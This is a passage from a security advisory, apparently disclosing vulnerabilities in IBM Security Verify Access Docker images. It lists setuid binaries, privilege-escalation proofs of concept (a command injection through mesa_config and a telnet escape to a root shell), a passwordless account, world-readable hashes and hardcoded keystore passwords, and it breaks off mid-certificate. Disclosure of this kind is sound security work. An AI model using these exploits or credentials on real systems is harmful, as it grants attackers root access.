\n    # The name that we can dlopen(3). \n    dlname=\u0027syncprov-2.4.so.2\u0027\n    \n    # Names of this library. \n    library_names=\u0027syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so\u0027\n    [...]\n    # Files to dlopen/dlpreopen\n    dlopen=\u0027\u0027\n    dlpreopen=\u0027\u0027\n    \n    # Directory that this library needs to be installed in:\n    libdir=\u0027/usr/lib64/openldap\u0027\n\n\n\n## Details - Local Privilege Escalation using rpm\n\nThe binary npm has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root. \n\nUsing a static analysis, with the file system that has been extracted - the `usr/bin/rpm` program is `root:root` and `4755`:\n\n    kali-extraction-docker# docker images\n    REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE\n    ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB\n    ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB\n    ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB\n    ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB\n    \n    kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm \n    -rwsr-sr-x 1 root root 21336 Apr  5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm\n\nWhile checking on a live system, we can confirm the permissions `4755` (suid bit) are used in the verify-access docker image. The file belongs to `root:root`:\n\n    [isam@verify-access /]$ ls -la /usr/bin/rpm\n    -rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm\n    [isam@verify-access /]$ /usr/bin/rpm\n    RPM version 4.14.3\n    Copyright (C) 1998-2002 - Red Hat, Inc. \n    This program may be freely redistributed under the terms of the GNU GPL\n    \n    Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]\n            [--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]\n            [--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=\u003cpackage\u003e+] [--excludedocs] [--excludepath=\u003cpath\u003e] [--force] [-F|--freshen=\u003cpackagefile\u003e+] [-h|--hash]\n            [--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]\n            [--prefix=\u003cdir\u003e] [--relocate=\u003cold\u003e=\u003cnew\u003e] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=\u003cpackagefile\u003e+] [--reinstall=\u003cpackagefile\u003e+] [-D|--define=\u0027MACRO EXPR\u0027] [--undefine=MACRO] [-E|--eval=\u0027EXPR\u0027]\n            [--target=CPU-VENDOR-OS] [--macros=\u003cFILE:...\u003e] [--noplugins] [--nodigest] [--nosignature] [--rcfile=\u003cFILE:...\u003e] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]\n            [--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]\n            [--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]\n    [isam@verify-access /]$\n\nAn attacker can run rpm as root to add or remove any package in the system, providing a full root access. \n\n\n\n## Details - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes\n\nIt was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (`4755` - suid bit, with `root:root` or `root:ivmgr` as ownership) allowing any local user to run these programs as root: \n\n- - /opt/PolicyDirector/bin/pdmgrd\n- - /opt/pdweb/bin/webseald\n- - /usr/bin/rpm\n- - /usr/sbin/slapd\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_cli\n- - /usr/sbin/mesa_control\n- - /usr/sbin/mesa_lcd\n- - /usr/sbin/mesa_stats\n\nBinaries with the suid bit:\n\n    [isam@verify-access]$ ls -la /usr/sbin/slapd\n    -rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_lcd\n    -rwsr-xr-x 1 root root 57240 Jun  8 13:29 /usr/sbin/mesa_lcd\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_control\n    -rwsr-xr-x 1 root root 98448 Jun  8 13:29 /usr/sbin/mesa_control\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_config\n    -rwsr-sr-x 1 root root 2975680 Jun  8 13:29 /usr/sbin/mesa_config\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_stats\n    -rwsr-xr-x 1 root root 11176 Jun  8 13:13 /usr/sbin/mesa_stats\n    [isam@verify-access]$ ls -la /usr/sbin/mesa_cli\n    -rwsr-xr-x 1 root root 436160 Jun  8 13:29 /usr/sbin/mesa_cli\n    [isam@verify-access]$ ls -la /usr/bin/rpm\n    -rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm\n    [isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd\n    -r-sr-sr-x 1 root ivmgr 32040 Jun  8 13:30 /opt/PolicyDirector/bin/pdmgrd\n    [isam@verify-access]$ ls -la /opt/pdweb/bin/webseald\n    -r-sr-s--- 1 root ivmgr 29296 Jun  8 13:30 /opt/pdweb/bin/webseald\n    [isam@verify-access]$ ls -la /opt/dsc/bin/dscd\n    -r-sr-s--- 1 ivmgr ivmgr 24264 Jun  8 13:30 /opt/dsc/bin/dscd\n\nFour trivial Local Privilege Escalations were found using the suid bit. Some additional LPEs may also exist in these programs. Trivial LPEs can be found everywhere in the mesa_* programs. \n\nAn attacker can get Local Privilege Escalations as root inside instances based on the ibmcom/verify-access image. \n\nThe code of `mesa_*` programs contains several trivial vulnerabilities due to the use of the `MesaSystem` function (and its derivatives) found in the `libwsmesa.so` library. This function is an insecure wrapper to the `execv()` function using the arguments `/bin/sh -c` and attacker-controlled values. The use of `/bin/sh -c` allows command injections. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Local Privilege Escalation using mesa_config - import of a new snapshot\n\nThe `mesa_config` program allows importing a new snapshot. This allows an attacker to get a Local Privilege Escalation as root by importing a new snapshot:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe function `MainApplySnapshot` will install the new malicious snapshot as root:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Local Privilege Escalation using mesa_config - command injections\n\nExploiting the `fips_zeroize_files` option in the `mesa_config` program will provide a root access. \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThe following PoC will provide root privileges inside the current instance:\n\n    [isam@verify-access /]$ id\n    uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    [isam@verify-access /]$ cat /tmp/test.sh \n    #!/bin/sh\n    id \u003e /tmp/id-2\n    \n    [isam@verify-access /]$ ls -la /tmp/id-2\n    ls: cannot access \u0027/tmp/id-2\u0027: No such file or directory\n    [isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files \"AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh\"\n    [isam@verify-access /]$ ls -la /tmp/id-2\n    -rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2\n    [isam@verify-access /]$ cat /tmp/id-2\n    uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    [isam@verify-access /]$\n\n\n\n## Details - Local Privilege Escalation using mesa_cli - import of a new snapshot\n\nThe main_cli program is also vulnerable to LPE. This tool allows managing the instance from any user:\n\n    [isam@verify-access]$ mesa_cli\n    Welcome to the IBM Security Verify Access appliance\n    Enter \"help\" for a list of available commands\n    verify-access\u003e help\n    Current mode commands:\n    diagnostics           Work with the IBM Security Verify Access diagnostics. \n    extensions            List and remove extensions installed on the appliance. \n    fips                  View FIPS 140-2 state and events. \n    fixpacks              Work with fix packs. \n    isam                  Work with the IBM Security Verify Access settings. \n    license               Work with licenses. \n    lmi                   Work with the local management interface. \n    lmt                   Work with the license metric tool. \n    management            Work with management settings. \n    pending_changes       Work with the IBM Security Verify Access pending\n                          changes. \n    snapshots             Work with policy snapshot files. \n    support               Work with support information files. \n    tools                 Work with network diagnostic tools. \n    Global commands:\n    back                  Return to the previous command mode. \n    exit                  Log off from the appliance. \n    help                  Display information for using the specified command. \n    reload                Reload the container configuration. \n    shutdown              End system operation and turn off the power. \n    state                 Display the current state of the container. \n    top                   Return to the top level. \n    verify-access\u003e snapshots\n    verify-access:snapshots\u003e help\n    Current mode commands:\n    apply                 Apply a policy snapshot file to the system. \n    create                Create a snapshot of current policy files. \n    delete                Delete a policy snapshot file. \n    get_comment           View the comment associated with a policy snapshot file. \n    list                  List the policy snapshot files. \n    set_comment           Replace the comment associated with a policy snapshot\n                          file. \n    Global commands:\n    back                  Return to the previous command mode. \n    exit                  Log off from the appliance. \n    help                  Display information for using the specified command. \n    reload                Reload the container configuration. \n    shutdown              End system operation and turn off the power. \n    state                 Display the current state of the container. \n    top                   Return to the top level. \n    verify-access:snapshots\u003e exit\n    [isam@verify-access /]$\n\nThe `apply` command inside the snapshots menu allows an attacker to install a new malicious snapshot as root and get a Local Privilege Escalation. \n\n\n\n## Details - Local Privilege Escalation using mesa_cli - telnet escape shell\n\nAnother LPE was found using the telnet client available within `mesa_cli`: it is possible to escape the telnet client using the `^]` keys and get a shell as root:\n\n    [isam@verify-access /]$ id\n    uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    [isam@verify-access /]$ mesa_cli\n    Welcome to the IBM Security Verify Access appliance\n    Enter \"help\" for a list of available commands\n    verify-access\u003e tools\n    verify-access:tools\u003e telnet test-server01.lan 22\n    Trying 10.0.0.14... \n    Connected to test-server01.lan. \n    Escape character is \u0027^]\u0027. \n    SSH-2.0-OpenSSH_8.0\n    ^]\n    telnet\u003e !sh\n    sh-4.4# id\n    uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)\n    sh-4.4# touch /tmp/pwned-root\n    sh-4.4# exit\n    exit\n    ^]\n    telnet\u003e q\n    Connection closed. \n    verify-access:tools\u003e exit\n    [isam@verify-access /]$ ls -la /tmp/pwned-root\n    -rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root\n    [isam@verify-access /]$\n\nThe `sub_410330` function will `execv()` telnet through the `MesaSpawn` function:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n\n\n## Details - Outdated OpenSSL\n\nIt was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022. \n\nAt the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable. \n\nAnalysis of the libssl.so.1.1.1k files found in the 4 Docker images:\n\n    kali-docker# sha256sum **/libssl.so.1.1.1k                                                                                                       \n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k\n    2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k\n                                                                                                                                                                                                                        \n    kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1\n    OPENSSL_1_1_1\n    OPENSSL_1_1_1a\n    OpenSSL 1.1.1k  FIPS 25 Mar 2021\n    libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug\n\nWe can confirm the OpenSSL version is provided by the package libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64. \n\nThe security announcement from Redhat patching vulnerabilities in the version libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64 is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818). \n\nThe packages patching the vulnerabilities are:\n\n- - openssl-1.1.1k-7.el8_6.x86_64.rpm\n- - openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm\n- - [...]\n\nWith access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:\n\n    [root@container-01]# podman ps\n    CONTAINER ID  IMAGE                                                                        COMMAND               CREATED      STATUS                    PORTS                             NAMES\n    413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                                4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    a2142514d831  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                        4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:9443-\u003e9443/tcp            verify-access-runtime\n    e0c55b6440cf  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                            4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:8443-8444-\u003e8443-8444/tcp  verify-access-dsc\n    [root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c \u0027rpm -qa|grep -i openssl\u0027;echo;done\n    openssl-1.1.1k-6.el8_5.x86_64\n    openssl-libs-1.1.1k-6.el8_5.x86_64\n    apr-util-openssl-1.6.1-6.el8.x86_64\n    \n    openssl-libs-1.1.1k-6.el8_5.x86_64\n    \n    openssl-libs-1.1.1k-6.el8_5.x86_64\n    openssl-1.1.1k-6.el8_5.x86_64\n\n\nThe official Docker images contain known vulnerabilities. \n\n\n\n## Details - PermitRootLogin set to yes\n\nIt was observed that the configuration file `/etc/sysconfig/sshd-permitrootlogin` will allow the connection from root in the Docker images:\n\n    kali-docker# find . | grep sshd-permitrootlogin\n    ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin\n    ./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n    ./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n    ./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin\n    kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n    # This file has been generated by the Anaconda Installer. \n    # Allow root to log in using ssh. Remove this file to opt-out. \n    PERMITROOTLOGIN=\"-oPermitRootLogin=yes\"\n\nIf a SSH server was installed inside the instances, it would be then possible to login as root. \n\n\n\n## Details - Lack of password for the `cluster` user\n\nIt was observed that the `cluster` user in the Docker image verify-access does not have a password defined in the `/etc/shadow` file:\n\n    kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster\n    cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh\n    \n    kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster        \n    cluster::19151:0:99999:7:::\n    \n    kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow         \n    admin:admin:19151:0:99999:7:::\n    cluster:NO PASSWORD:19151:0:99999:7:::\n    \n    2 password hashes cracked, 0 left\n\n\nIn the live environment, it was confirmed that the user `cluster` does not have a password in the `verify-access` instance:\n\n    [root@test-server 5ecd09e2d7bb10f3bec5b6be4c2298d6bdb54b70a75ce67944651b6b5330821e]# cat ./merged/etc/shadow | grep cluster\n    cluster::19151:0:99999:7:::\n\nIf a SSH server was installed inside the instances, it would be then possible to login as cluster without a password. \n\nA user with a local access can get `cluster` privileges. \n\n\n\n## Details - Non-standard way of storing hashes and world-readable files containing hashes\n\nIt was observed that passwords are saved in 3 non-standard files in the Docker image verify-access:\n\n- - `/etc/shadow.isam`\n- - `/etc/admin.pwd`\n- - `/etc/wga_notifications.conf`\n\nFurthermore, the `/etc/shadow.isam` and `/etc/wga_notifications.conf` files are world-readable. \n\nWhen extracting verify-access, we can find the `/etc/shadow.isam` file:\n\n    kali-docker# cat ./698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/shadow.isam\n    admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n    www-data:*:14251:0:99999:7:::\n    ivmgr:!!:19151:0:99999:7:::\n    cluster::19151:0:99999:7:::\n    pgresql:!!:19151:0:99999:7:::\n    nfast:!!:19151:0:99999:7:::\n    tivoli:!!:19151:0:99999:7:::\n\nWhen checking on the live system (verify-access), we can find these 3 previous files, 2 of which are world-readable:\n\n    [root@container-01]# podman ps | grep 413823e2f7d1\n    413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         7 hours ago  Up 7 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    [root@container-01]#\n    \n    [root@container-01]# podman ps|grep 413823e2f7d1\n    413823e2f7d1  ibmcom/verify-access/verify-access/10.0.4.0:20220926.6                         25 hours ago  Up 25 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    [root@container-01]# podman exec -it  413823e2f7d1 ls -la /etc/wga_notifications.conf /etc/shadow.isam /etc/admin.pwd\n    -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n    -rw-r--r-- 1 root root 305 Jun  8 13:43 /etc/shadow.isam\n    -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n    [root@container-01]#\n\nFurthermore, we can extract passwords from these files. The hash in `/etc/shadow.isam` seems to be hardcoded (`admin`):\n\n    [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/shadow.isam\n    admin:$6$weihWRw2JbThkJd0$t.Q3XdwZw/KYTCa35T3w/otmRG4R7jlrVguBt8BrR4bEUbf5/OHJrifnpJg.p2WBOPM43gj6IGb2ZNyzDjbeS.:19151:0:99999:7:::\n    www-data:*:14251:0:99999:7:::\n    ivmgr:!!:19151:0:99999:7:::\n    cluster::19151:0:99999:7:::\n    pgresql:!!:19151:0:99999:7:::\n    nfast:!!:19151:0:99999:7:::\n    tivoli:!!:19151:0:99999:7:::\n    \n    [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/admin.pwd\n    -rw-rw---- 1 root root 344 Sep 26 15:31 /etc/admin.pwd\n    [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd\n    [REDACTED]\n    \n    [root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf\n    -rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf\n    [root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf\n    [...]\n    sam_cluster.hvdb.driver_type = thin\n    isam_cluster.hvdb.embedded = false\n    isam_cluster.hvdb.port = 1536\n    isam_cluster.hvdb.pwd = [REDACTED]\n    isam_cluster.hvdb.secure = false\n    [...]\n\n\nA local attacker can extract hashes from world-readable files and elevate its privileges. \n\nThe use of `/etc/shadow.isam` is unknown. \n\n\n\n## Details - Hardcoded PKCS#12 files\n\nIt was observed the Docker image verify-access contains hardcoded PKCS#12 files:\n\n- - /var/isam/cluster/sundry/odbc/ewallet.p12\n- - /var/pdweb/shared/keytab/lmi_trust_store.p12\n- - /var/pdweb/shared/keytab/embedded_ldap_keys.p12\n- - /var/pdweb/shared/keytab/rt_profile_keys.p12\n\nThe `/var/isam/cluster/sundry/odbc/ewallet.p12` file can be found inside the verify-access image:\n\n    kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n    -rw-r--r-- 1 5000 5000 736 Jun  8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n    \n    kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n    687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12\n\nWhen checking on the live system (verify-access), we can find this unchanged file:\n\n    [root@container-01]# podman ps | grep 413823e2f7d1\n    413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         26 hours ago  Up 26 hours ago (healthy)  0.0.0.0:7443-\u003e9443/tcp            verify-access\n    [root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/\n    total 16\n    drwxr-xr-x 2 www-data www-data 4096 Jun  8 13:43 . \n    drwxr-xr-x 3 cluster  cluster  4096 Jun  8 13:43 .. \n    -rw-r--r-- 1 www-data www-data  781 Jun  8 13:32 cwallet.sso\n    -rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 cwallet.sso.lck\n    -rw-r--r-- 1 www-data www-data  736 Jun  8 13:32 ewallet.p12\n    -rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 ewallet.p12.lck\n    [root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12\n    687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  /var/isam/cluster/sundry/odbc/ewallet.p12\n    [root@container-01]#\n\nThis file is used by several programs, with a trivial password (`passw0rd`) to encrypt it:\n\nAssembly code of the function `authorSqlFuseFiles` found inside `mesa_config`, used to extract ewallet.p12:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nExtraction using OpenSSL:\n\n    kali-docker# openssl pkcs12 -in ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test        \n    Enter Import Password: [passw0rd]\n    kali-docker# cat /tmp/ewallet.test\n    Bag Attributes\n        localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04 \n    subject=C = us, O = ibm, CN = rhel66.home.com\n    issuer=C = us, O = ibm, CN = rhel66.home.com\n    -----BEGIN CERTIFICATE-----\n    MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV\n    BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx\n    N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY\n    MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB\n    iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1\n    IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR\n    71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG\n    SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so\n    1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+\n    ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64\n    -----END CERTIFICATE-----\n    kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout                                                                                                                              \n    Certificate:\n        Data:\n            Version: 1 (0x0)\n            Serial Number: 0 (0x0)\n            Signature Algorithm: md5WithRSAEncryption\n            Issuer: C = us, O = ibm, CN = rhel66.home.com\n            Validity\n                Not Before: Jun  4 18:20:17 2016 GMT\n                Not After : Jun  2 18:20:17 2026 GMT\n            Subject: C = us, O = ibm, CN = rhel66.home.com\n            Subject Public Key Info:\n                Public Key Algorithm: rsaEncryption\n                    Public-Key: (1024 bit)\n                    Modulus:\n                        00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:\n                        ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:\n                        a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:\n                        6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:\n                        0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:\n                        6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:\n                        da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:\n                        7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:\n                        69:1a:e9:5f:66:c1:60:cf:7b\n                    Exponent: 65537 (0x10001)\n        Signature Algorithm: md5WithRSAEncryption\n        Signature Value:\n            5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:\n            d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:\n            51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:\n            de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:\n            92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:\n            c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:\n            0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:\n            9e:b8\n\nThe other files have been decrypted using `IBM Crypto For C` and OpenSSL. \n\nThe `lmi_trust_store.p12` file in the verify-access image contains several CAs and will also include the hardcoded key for the `Isam CA` in a live instance (after configuration):\n\n    kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12\n    kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword\n    \n    kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword\n    MAC: sha1, Iteration 1024\n    MAC length: 20, salt length: 8\n    PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n    Certificate bag\n    Bag Attributes\n        friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US\n        localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 